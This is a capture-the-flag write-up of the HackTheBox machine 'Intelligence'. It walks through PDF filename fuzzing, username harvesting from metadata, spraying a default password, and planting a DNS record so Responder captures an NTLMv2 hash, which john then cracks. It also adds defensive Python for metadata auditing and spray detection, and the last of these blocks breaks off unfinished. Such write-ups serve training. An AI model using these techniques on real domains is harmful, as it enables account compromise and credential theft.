Medium difficulty box - https://hackthebox.com
Intelligence was a medium box I solved a few months ago. It’s also technically the first machine I decided to share a write-up for, because I really enjoyed solving it.
RECON
nmap -A 10.10.10.248 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-26 16:35 CEST
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 41.30% done; ETC: 16:35 (0:00:04 remaining)
Nmap scan report for 10.10.10.248
Host is up (0.028s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-08-26 22:09:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-26T22:10:38+00:00; +7h33m44s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-26T22:10:38+00:00; +7h33m45s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-26T22:10:38+00:00; +7h33m44s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-26T22:10:38+00:00; +7h33m45s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h33m44s, deviation: 0s, median: 7h33m44s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-08-26T22:09:58
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.40 seconds
FOOTHOLD
Basic enumeration of the website on port 80 shows we can download a PDF file whose name follows a specific convention (a date followed by -upload.pdf).
Fuzzing the date part of the file name seemed like a good idea:
ffuf -w dates.txt -u http://intelligence.htb/documents/FUZZ-upload.pdf -mc 200
ffuf
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://intelligence.htb/documents/FUZZ-upload.pdf
:: Wordlist : FUZZ: dates.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
2020-01-20 [Status: 200, Size: 11632, Words: 157, Lines: 127]
2020-01-23 [Status: 200, Size: 11557, Words: 167, Lines: 136]
2020-01-01 [Status: 200, Size: 26835, Words: 241, Lines: 209]
<SNIP>
2021-02-25 [Status: 200, Size: 26700, Words: 228, Lines: 180]
2021-03-01 [Status: 200, Size: 11254, Words: 175, Lines: 135]
2021-03-07 [Status: 200, Size: 10676, Words: 164, Lines: 139]
2021-03-10 [Status: 200, Size: 25109, Words: 240, Lines: 199]
2021-03-18 [Status: 200, Size: 27992, Words: 220, Lines: 203]
2021-03-21 [Status: 200, Size: 26810, Words: 229, Lines: 205]
2021-03-25 [Status: 200, Size: 27327, Words: 231, Lines: 211]
2021-03-27 [Status: 200, Size: 12127, Words: 166, Lines: 141]
2020-03-13 [Status: 200, Size: 24888, Words: 213, Lines: 204]
2020-07-08 [Status: 200, Size: 11910, Words: 167, Lines: 141]
:: Progress: [578/578] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
Results show there is more than one pdf :D
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence$ ls
dates.txt get_doc_info.py intelligence-writeup kerbrute_linux_amd64 names.txt test user.txt
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence$ cat results.txt | awk '{print $1}'
2020-01-20
2020-01-23
2020-01-01
2020-01-02
2020-01-30
2020-01-04
<SNIP>
2021-03-25
2021-03-27
2020-03-13
2020-07-08
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence$ cat results.txt | awk '{print $1}' > results.txt
From here I kept trying to force myself to automate because it felt like a waste of good time to click everything, considering the quantity.
#download_valid_pdfs.sh
# Fetch every PDF whose date the ffuf run confirmed (one date per line in results.txt)
cat results.txt | while read -r i
do
    curl "http://intelligence.htb/documents/$i-upload.pdf" -o "$i-upload.pdf"
done
Download everything:
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence$ ./download_valid_pdfs.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 11632 100 11632 0 0 270k 0 --:--:-- --:--:-- --:--:-- 270k
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 11557 100 11557 0 0 225k 0 --:--:-- --:--:-- --:--:-- 225k
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 26835 100 26835 0 0 374k 0 --:--:-- --:--:-- --:--:-- 379k
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 27002 100 27002 0 0 393k 0 --:--:-- --:--:-- --:--:-- 399k
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 26706 100 26706 0 0 401k 0 --:--:-- --:--:-- --:--:-- 407k
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 27522 100 27522 0 0 389k 0 --:--:-- --:--:-- --:--:-- 389k
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 11228 100 11228 0 0 228k 0 --:--:-- --:--:-- --:--:-- 228k
<SNIP>
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 11910 100 11910 0 0 232k 0 --:--:-- --:--:-- --:--:-- 232k
Make sure everything is here:
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence$ ls
2020-01-01-upload.pdf 2020-03-12-upload.pdf 2020-05-29-upload.pdf 2020-07-06-upload.pdf 2020-09-22-upload.pdf 2020-12-20-upload.pdf 2021-03-21-upload.pdf
2020-01-02-upload.pdf 2020-03-13-upload.pdf 2020-06-02-upload.pdf 2020-07-08-upload.pdf 2020-09-27-upload.pdf 2020-12-24-upload.pdf 2021-03-25-upload.pdf
2020-01-04-upload.pdf 2020-03-17-upload.pdf 2020-06-03-upload.pdf 2020-07-20-upload.pdf 2020-09-29-upload.pdf 2020-12-28-upload.pdf 2021-03-27-upload.pdf
2020-01-10-upload.pdf 2020-03-21-upload.pdf 2020-06-04-upload.pdf 2020-07-24-upload.pdf 2020-09-30-upload.pdf 2020-12-30-upload.pdf dates.txt
2020-01-20-upload.pdf 2020-04-02-upload.pdf 2020-06-07-upload.pdf 2020-08-01-upload.pdf 2020-10-05-upload.pdf 2021-01-03-upload.pdf get_doc_info.py
2020-01-22-upload.pdf 2020-04-04-upload.pdf 2020-06-08-upload.pdf 2020-08-03-upload.pdf 2020-10-19-upload.pdf 2021-01-14-upload.pdf intelligence-writeup
2020-01-23-upload.pdf 2020-04-15-upload.pdf 2020-06-12-upload.pdf 2020-08-09-upload.pdf 2020-11-01-upload.pdf 2021-01-25-upload.pdf kerbrute_linux_amd64
2020-01-25-upload.pdf 2020-04-23-upload.pdf 2020-06-14-upload.pdf 2020-08-19-upload.pdf 2020-11-03-upload.pdf 2021-01-30-upload.pdf names.txt
2020-01-30-upload.pdf 2020-05-01-upload.pdf 2020-06-15-upload.pdf 2020-08-20-upload.pdf 2020-11-06-upload.pdf 2021-02-10-upload.pdf results.txt
2020-02-11-upload.pdf 2020-05-03-upload.pdf 2020-06-21-upload.pdf 2020-09-02-upload.pdf 2020-11-10-upload.pdf 2021-02-13-upload.pdf test
2020-02-17-upload.pdf 2020-05-07-upload.pdf 2020-06-22-upload.pdf 2020-09-04-upload.pdf 2020-11-11-upload.pdf 2021-02-21-upload.pdf user.txt
2020-02-23-upload.pdf 2020-05-11-upload.pdf 2020-06-25-upload.pdf 2020-09-05-upload.pdf 2020-11-13-upload.pdf 2021-02-25-upload.pdf
2020-02-24-upload.pdf 2020-05-17-upload.pdf 2020-06-26-upload.pdf 2020-09-06-upload.pdf 2020-11-24-upload.pdf 2021-03-01-upload.pdf
2020-02-28-upload.pdf 2020-05-20-upload.pdf 2020-06-28-upload.pdf 2020-09-11-upload.pdf 2020-11-30-upload.pdf 2021-03-07-upload.pdf
2020-03-04-upload.pdf 2020-05-21-upload.pdf 2020-06-30-upload.pdf 2020-09-13-upload.pdf 2020-12-10-upload.pdf 2021-03-10-upload.pdf
2020-03-05-upload.pdf 2020-05-24-upload.pdf 2020-07-02-upload.pdf 2020-09-16-upload.pdf 2020-12-15-upload.pdf 2021-03-18-upload.pdf
These PDF files hold an interesting piece of metadata, the PDF Creator field, which will definitely be useful later on. Now, more automation:
# get_doc_info.py
from PyPDF2 import PdfFileReader  # PyPDF2 1.x API, as used at the time

def get_info(files):
    for pdf in files:
        with open(pdf, 'rb') as f:
            reader = PdfFileReader(f)
            info = reader.getDocumentInfo()
            number_of_pages = reader.getNumPages()
            print(info)  # the /Creator entry is the interesting one
            # Individual fields are available as attributes as well
            author = info.author
            creator = info.creator
            producer = info.producer
            subject = info.subject
            title = info.title

if __name__ == '__main__':
    files = ['2020-01-01-upload.pdf','2020-03-12-upload.pdf','2020-05-29-upload.pdf','2020-07-06-upload.pdf',
             <SNIP>
             '2021-03-10-upload.pdf','2020-03-05-upload.pdf','2020-05-24-upload.pdf','2020-07-02-upload.pdf',
             '2020-09-16-upload.pdf','2020-12-15-upload.pdf','2021-03-18-upload.pdf']
    get_info(files)
Output:
{'/Creator': 'William.Lee'}
{'/Creator': 'Thomas.Valenzuela'}
{'/Creator': 'Thomas.Valenzuela'}
{'/Creator': 'Scott.Scott'}
{'/Creator': 'Tiffany.Molina'}
{'/Creator': 'David.Wilson'}
{'/Creator': 'Veronica.Patel'}
{'/Creator': 'Scott.Scott'}
{'/Creator': 'Travis.Evans'}
{'/Creator': 'David.Reed'}
{'/Creator': 'Teresa.Williamson'}
{'/Creator': 'Jose.Williams'}
{'/Creator': 'Thomas.Hall'}
{'/Creator': 'Ian.Duncan'}
{'/Creator': 'Jason.Wright'}
{'/Creator': 'Samuel.Richardson'}
{'/Creator': 'Kaitlyn.Zimmerman'}
{'/Creator': 'John.Coleman'}
{'/Creator': 'Jessica.Moody'}
{'/Creator': 'Ian.Duncan'}
{'/Creator': 'Richard.Williams'}
{'/Creator': 'Veronica.Patel'}
{'/Creator': 'Richard.Williams'}
{'/Creator': 'Jason.Patterson'}
{'/Creator': 'Veronica.Patel'}
{'/Creator': 'Brian.Baker'}
{'/Creator': 'Jason.Patterson'}
{'/Creator': 'Jennifer.Thomas'}
{'/Creator': 'David.Mcbride'}
{'/Creator': 'Thomas.Valenzuela'}
{'/Creator': 'John.Coleman'}
{'/Creator': 'Anita.Roberts'}
{'/Creator': 'Stephanie.Young'}
{'/Creator': 'Danny.Matthews'}
{'/Creator': 'Jose.Williams'}
{'/Creator': 'David.Mcbride'}
{'/Creator': 'Samuel.Richardson'}
{'/Creator': 'Teresa.Williamson'}
{'/Creator': 'Kaitlyn.Zimmerman'}
{'/Creator': 'David.Reed'}
{'/Creator': 'John.Coleman'}
{'/Creator': 'Darryl.Harris'}
{'/Creator': 'Ian.Duncan'}
{'/Creator': 'Kaitlyn.Zimmerman'}
{'/Creator': 'Travis.Evans'}
{'/Creator': 'Stephanie.Young'}
{'/Creator': 'William.Lee'}
{'/Creator': 'William.Lee'}
{'/Creator': 'Nicole.Brock'}
{'/Creator': 'Jose.Williams'}
{'/Creator': 'Kelly.Long'}
{'/Creator': 'Daniel.Shelton'}
{'/Creator': 'Anita.Roberts'}
{'/Creator': 'Stephanie.Young'}
{'/Creator': 'William.Lee'}
{'/Creator': 'Stephanie.Young'}
{'/Creator': 'Danny.Matthews'}
{'/Creator': 'Jose.Williams'}
{'/Creator': 'Brian.Baker'}
{'/Creator': 'David.Reed'}
{'/Creator': 'Jason.Wright'}
{'/Creator': 'Samuel.Richardson'}
{'/Creator': 'Travis.Evans'}
{'/Creator': 'John.Coleman'}
{'/Creator': 'Jose.Williams'}
{'/Creator': 'Nicole.Brock'}
{'/Creator': 'Travis.Evans'}
{'/Creator': 'Tiffany.Molina'}
{'/Creator': 'Jessica.Moody'}
{'/Creator': 'Jason.Wright'}
{'/Creator': 'David.Mcbride'}
{'/Creator': 'David.Mcbride'}
{'/Creator': 'David.Mcbride'}
{'/Creator': 'Ian.Duncan'}
{'/Creator': 'Thomas.Valenzuela'}
{'/Creator': 'Jose.Williams'}
{'/Creator': 'Kelly.Long'}
{'/Creator': 'William.Lee'}
{'/Creator': 'Jessica.Moody'}
{'/Creator': 'Kelly.Long'}
{'/Creator': 'Anita.Roberts'}
{'/Creator': 'Daniel.Shelton'}
{'/Creator': 'John.Coleman'}
{'/Creator': 'Stephanie.Young'}
{'/Creator': 'Ian.Duncan'}
{'/Creator': 'Travis.Evans'}
{'/Creator': 'Stephanie.Young'}
{'/Creator': 'Brian.Morris'}
{'/Creator': 'Jose.Williams'}
{'/Creator': 'John.Coleman'}
{'/Creator': 'Jason.Wright'}
{'/Creator': 'Ian.Duncan'}
{'/Creator': 'David.Reed'}
{'/Creator': 'Jennifer.Thomas'}
{'/Creator': 'Nicole.Brock'}
{'/Creator': 'David.Wilson'}
{'/Creator': 'Richard.Williams'}
{'/Creator': 'Jose.Williams'}
{'/Creator': 'Jose.Williams'}
I turned this output into another list:
python3 get_doc_info.py | awk '{print $2}'| sed 's/..$//;s/.//' > users_clean.txt
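Seen from the publishing side, the same metadata walk is the check an organisation should run on documents before they go on a public web server. The Python below is an added example, not the author's script: it reads the classic (uncompressed) PDF Info dictionary straight from the file bytes, so it needs no third-party library, flags values shaped like an AD logon name (First.Last) and counts how often each Creator appears. The sample "documents" are constructed byte strings that carry only the Info entries this parser reads, not the real files from the box; PDFs whose Info dictionary sits inside a compressed object stream come back empty rather than parsed.

```python
"""Audit PDFs for identity-bearing metadata before they are published.

Added example, not part of the original write-up. Parses the classic
(uncompressed) Info dictionary directly from the file bytes; files whose
Info dictionary lives in a compressed object stream yield no fields.
"""
import re
from collections import Counter

# Fields that commonly carry a person's name or account identifier.
IDENTITY_FIELDS = ("Author", "Creator", "Producer", "Title", "Subject")

# Matches /Key (literal string) or /Key <hex string> inside a dictionary.
_FIELD_RE = re.compile(
    rb"/(" + b"|".join(f.encode() for f in IDENTITY_FIELDS) + rb")\s*"
    rb"(?:\((?P<lit>(?:\\.|[^\\)])*)\)|<(?P<hex>[0-9A-Fa-f\s]*)>)"
)

# "First.Last" is the AD logon-name style seen in this write-up.
_LOGON_RE = re.compile(r"^[A-Z][a-z]+\.[A-Z][a-z]+$")


def _decode(m):
    """Turn a matched literal or hex PDF string into Python text."""
    if m.group("lit") is not None:
        raw = re.sub(rb"\\([()\\])", rb"\1", m.group("lit"))  # unescape \( \) \\
        return raw.decode("latin-1")
    hexdata = re.sub(rb"\s", b"", m.group("hex"))
    return bytes.fromhex(hexdata.decode("ascii")).decode("latin-1")


def extract_info(pdf_bytes):
    """Return {field: value} for identity fields found in the Info dict."""
    return {m.group(1).decode(): _decode(m) for m in _FIELD_RE.finditer(pdf_bytes)}


def looks_like_logon_name(value):
    return bool(_LOGON_RE.match(value))


def audit(documents):
    """documents: {filename: bytes}. Returns (findings, creator_counts).

    findings       - list of (filename, field, value) shaped like logon names
    creator_counts - how often each /Creator value appears across the set
    """
    findings = []
    creators = Counter()
    for name, data in documents.items():
        for field, value in extract_info(data).items():
            if looks_like_logon_name(value):
                findings.append((name, field, value))
            if field == "Creator":
                creators[value] += 1
    return findings, creators


# Constructed sample documents: minimal PDF skeletons carrying only the
# Info entries this parser reads (not real files from the box).
SAMPLE_DOCS = {
    "2020-01-01-upload.pdf": (b"%PDF-1.4\n1 0 obj\n<< /Creator (William.Lee) "
                              b"/Producer (Microsoft Word) >>\nendobj\n%%EOF\n"),
    "2020-06-04-upload.pdf": (b"%PDF-1.4\n1 0 obj\n<< /Title <4E657720416363"
                              b"6F756E74204775696465> /Creator (Tiffany.Molina) >>\n"
                              b"endobj\n%%EOF\n"),
    "clean.pdf": b"%PDF-1.4\n1 0 obj\n<< /Creator (Marketing Team) >>\nendobj\n%%EOF\n",
}

if __name__ == "__main__":
    found, counts = audit(SAMPLE_DOCS)
    for item in found:
        print("LEAK  %s: /%s = %s" % item)
    print("creators:", dict(counts))
```

Run it over a directory by reading each file's bytes into the dictionary; anything reported as LEAK should have its metadata stripped before upload, and a Creator value that repeats across many documents is a username pattern an attacker can enumerate.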
Now, to read all of those PDFs (or at least check them for certain risky keywords) without opening each one manually, I needed some more scripting:
#find_keywords.py
from pdfminer.high_level import extract_text

files = ['2020-01-01-upload.pdf','2020-03-12-upload.pdf','2020-05-29-upload.pdf','2020-07-06-upload.pdf',
         <SNIP>
         '2020-09-16-upload.pdf','2020-12-15-upload.pdf','2021-03-18-upload.pdf']

keyword = "user"  # or "password" or "Account" or "login"

for i in files:
    text = extract_text(i)  # full text of the PDF via pdfminer
    if keyword in text:
        print(i)
        print(text)
Output:
2020-06-04-upload.pdf
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
At this point we have produced a lot of output, so let's make a checkpoint.
We have a password, NewIntelligenceCorpUser9876, and a list of users we can use to spray the machine.
I assumed that with this many users, there was a fair chance one of them hadn't managed to change their default password.
I used crackmapexec to spray the password against the user list:
crackmapexec smb intelligence.htb -u users_clean.txt -p NewIntelligenceCorpUser9876
This confirmed that the user Tiffany.Molina had kept the default password.
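From the defender's side, a spray like this is visible in the domain controller's logon audit: one source address failing against many distinct accounts inside a short window, followed by a success from the same address. The Python below is an added example, not the author's code. It assumes the 4625 (failure) and 4624 (success) events have been exported as one key=value line each, with the Windows Security log field names EventID, TargetUserName and IpAddress; the sample lines are constructed, not taken from the box.

```python
"""Detect a password spray in exported Windows logon audit events.

Added example, not from the original write-up. Assumes one key=value
line per event (the shape a SIEM export would produce); the sample
lines below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one source tries many accounts within seconds and
# one of them succeeds; a second source is just a user mistyping twice.
SAMPLE_EVENTS = """\
2021-08-26T22:10:01Z EventID=4625 TargetUserName=William.Lee IpAddress=10.10.14.5 Status=0xC000006D SubStatus=0xC000006A
2021-08-26T22:10:02Z EventID=4625 TargetUserName=Thomas.Valenzuela IpAddress=10.10.14.5 Status=0xC000006D SubStatus=0xC000006A
2021-08-26T22:10:02Z EventID=4625 TargetUserName=Scott.Scott IpAddress=10.10.14.5 Status=0xC000006D SubStatus=0xC000006A
2021-08-26T22:10:03Z EventID=4625 TargetUserName=Administrator IpAddress=10.10.14.5 Status=0xC000006D SubStatus=0xC000006A
2021-08-26T22:10:03Z EventID=4625 TargetUserName=David.Wilson IpAddress=10.10.14.5 Status=0xC000006D SubStatus=0xC000006A
2021-08-26T22:10:04Z EventID=4624 TargetUserName=Tiffany.Molina IpAddress=10.10.14.5 LogonType=3
2021-08-26T22:10:30Z EventID=4625 TargetUserName=Ted.Graves IpAddress=10.10.10.50 Status=0xC000006D SubStatus=0xC000006A
2021-08-26T22:10:35Z EventID=4625 TargetUserName=Ted.Graves IpAddress=10.10.10.50 Status=0xC000006D SubStatus=0xC000006A
"""


def parse_event(line):
    """Turn '<timestamp> k=v k=v ...' into a dict with a datetime 'ts'."""
    ts, _, rest = line.partition(" ")
    ev = dict(kv.split("=", 1) for kv in rest.split())
    ev["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return ev


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """One alert per source IP that failed against >= min_accounts distinct
    users inside `window`; the alert lists successes from that IP in the
    same period (accounts to treat as compromised)."""
    failures = defaultdict(list)   # ip -> [(ts, user)]
    successes = defaultdict(list)  # ip -> [(ts, user)]
    for ev in events:
        if ev.get("EventID") == "4625":
            failures[ev["IpAddress"]].append((ev["ts"], ev["TargetUserName"]))
        elif ev.get("EventID") == "4624":
            successes[ev["IpAddress"]].append((ev["ts"], ev["TargetUserName"]))

    alerts = []
    for ip, attempts in failures.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):          # sliding window over failures
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            users = {u for _, u in attempts[start:end + 1]}
            if len(users) >= min_accounts:
                first, last = attempts[start][0], attempts[end][0]
                hits = [u for t, u in successes.get(ip, [])
                        if first <= t <= last + window]
                alerts.append({"ip": ip, "accounts": len(users),
                               "compromised": sorted(hits)})
                break  # one alert per source is enough
    return alerts


def run(text=SAMPLE_EVENTS):
    return detect_spray(parse_event(l) for l in text.splitlines() if l.strip())


if __name__ == "__main__":
    for alert in run():
        print(alert)
```

The distinguishing signal is distinct accounts per source rather than failures per account, which is why a single user's repeated typos (10.10.10.50 above) do not trip it while the spray does; tune window and min_accounts to the size of the directory.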
smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -H intelligence.htb
Output:
[+] IP: intelligence.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
IT READ ONLY
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLY
PRIVILEGE ESCALATION
The "Users" share exposes the machine's user profile folders. We can find user.txt on Tiffany.Molina's Desktop.
smbclient //intelligence.htb/Users -U'Tiffany.Molina'
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Mon Apr 19 03:20:26 2021
.. DR 0 Mon Apr 19 03:20:26 2021
Administrator D 0 Mon Apr 19 02:18:39 2021
All Users DHSrn 0 Sat Sep 15 09:21:46 2018
Default DHR 0 Mon Apr 19 04:17:40 2021
Default User DHSrn 0 Sat Sep 15 09:21:46 2018
desktop.ini AHS 174 Sat Sep 15 09:11:27 2018
Public DR 0 Mon Apr 19 02:18:39 2021
Ted.Graves D 0 Mon Apr 19 03:20:26 2021
Tiffany.Molina D 0 Mon Apr 19 02:51:46 2021
3770367 blocks of size 4096. 1456196 blocks available
smb: \> ls -la
NT_STATUS_NO_SUCH_FILE listing \-la
smb: \> cd Tiffany.Molina\Desktop
smb: \Tiffany.Molina\Desktop\> get user.txt
In the “IT” share we have a file called downdetector.ps1
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence$ smbclient //intelligence.htb/IT -U'Tiffany.Molina'
Enter WORKGROUP\Tiffany.Molina's password:
session setup failed: NT_STATUS_LOGON_FAILURE
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence$ smbclient //intelligence.htb/IT -U'Tiffany.Molina'
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Apr 19 02:50:55 2021
.. D 0 Mon Apr 19 02:50:55 2021
downdetector.ps1 A 1046 Mon Apr 19 02:50:55 2021
3770367 blocks of size 4096. 1456172 blocks available
smb: \> allinfo
allinfo <file>
smb: \> allinfo downdetector.ps1
altname: DOWNDE~1.PS1
create_time: lun avr 19 02:50:55 2021 CEST
access_time: lun avr 19 02:50:55 2021 CEST
write_time: lun avr 19 02:50:55 2021 CEST
change_time: lun avr 19 02:50:58 2021 CEST
attributes: A (20)
stream: [::$DATA], 1046 bytes
smb: \> get downdetector.ps1
getting file downdetector.ps1 of size 1046 as downdetector.ps1 (11.9 KiloBytes/sec) (average 11.9 KiloBytes/sec)
smb: \> exit
Content of downdetector.ps1:
# downdetector.ps1
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
This PowerShell script checks every record in the DNS zone whose name starts with web and, if the response is not status code 200, notifies Ted.Graves. The request is sent with the UseDefaultCredentials switch parameter, which:
"Indicates that the cmdlet uses the credentials of the current user to send the web request. This can't be used with Authentication or Credential and may not be supported on all platforms."
Source: Microsoft PowerShell documentation for Invoke-WebRequest
This is a job for Responder, but first I need to add a DNS record starting with "web" that points to my machine, so that the scheduled script authenticates to me. This should allow us to grab a hash and try to crack it for credentials. To add the record we can use dnstool.py from krbrelayx.
Let's start Responder:
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence$ Responder.py -I tun0 -A
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.2.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
/! Warning: files/AccessDenied.html: file not found
/! Warning: files/BindShell.exe: file not found
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [ON]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.xx.xx]
Challenge set [1122334455667788]
Don't Respond To Names ['ISATAP']
In another window:
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence/krbrelayx$ python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'web_Starrydns_or_litterally_anything_else_with_web.intelligence.htb' -d <local ip> 10.10.10.248
Output:
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
Responder receives the NTLMv2 hash for Ted.Graves, so we can try to crack it!
[+] Listening for events...
[HTTP] NTLMv2 Client : <MACHINE IP>
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:<SNIP>
With john and the rockyou.txt wordlist, cracking the hash (saved in a file) was a matter of seconds:
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence$ sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Mr.Teddy (Ted.Graves)
1g 0:00:00:23 DONE (2021-07-05 03:40) 0.04170g/s 450978p/s 450978c/s 450978C/s Mrz.deltasigma..Mr BOB
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
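For whoever has to investigate a capture like this afterwards, the NetNTLMv2 line itself carries useful forensic detail: the server challenge (the Responder banner above shows it used the fixed value 1122334455667788, a reliable indicator of that tool in an NTLM exchange), the client's timestamp, and the target-info AV pairs naming the host and SPN the client believed it was talking to. The Python below is an added example, not the author's code. The line it parses is constructed by the block itself with a placeholder NTProofStr, not the hash captured on the box, and the SPN HTTP/web_example.intelligence.htb is a made-up name.

```python
"""Parse a captured NetNTLMv2 line for incident-response purposes.

Added example, not part of the original write-up. The sample line is
constructed (placeholder NTProofStr, made-up SPN), not the captured hash.
"""
import struct
from datetime import datetime, timedelta, timezone

RESPONDER_DEFAULT_CHALLENGE = "1122334455667788"  # shown in the Responder banner above

# AV_PAIR ids from MS-NLMP 2.2.2.1 that carry names worth reporting.
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 9: "TargetName"}

_EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """Windows FILETIME (100 ns ticks since 1601) -> aware datetime."""
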